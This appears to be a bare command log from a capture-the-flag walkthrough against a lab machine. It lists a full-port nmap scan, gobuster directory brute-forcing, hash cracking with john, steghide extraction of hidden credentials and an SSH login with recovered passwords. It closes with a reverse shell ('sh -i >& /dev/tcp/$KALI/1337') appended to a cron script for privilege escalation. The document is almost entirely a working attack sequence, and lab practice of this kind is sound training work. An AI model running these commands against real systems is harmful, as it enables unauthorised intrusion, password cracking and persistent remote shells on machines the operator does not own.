nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u http://$VICTIM/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
echo "ZmxhZ3tmMXJzN19mbDRnfQ==" |base64 -d
curl http://$VICTIM:65524/robots.txt
wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py
python hash-id.py 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81
john --wordlist=easypeasy.txt --format=GOST hash.txt
wget http://$VICTIM:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
steghide extract -sf binarycodepixabay.jpg
Password: mypasswordforthatjob
ssh boring@$VICTIM:6498
Password: iconvertedmypasswordtobinary
cat /etc/crontab
cd /var/www/
ls -lah
echo "sh -i >& /dev/tcp/$KALI/1337 0>&1" >> .mysecretcronjob.sh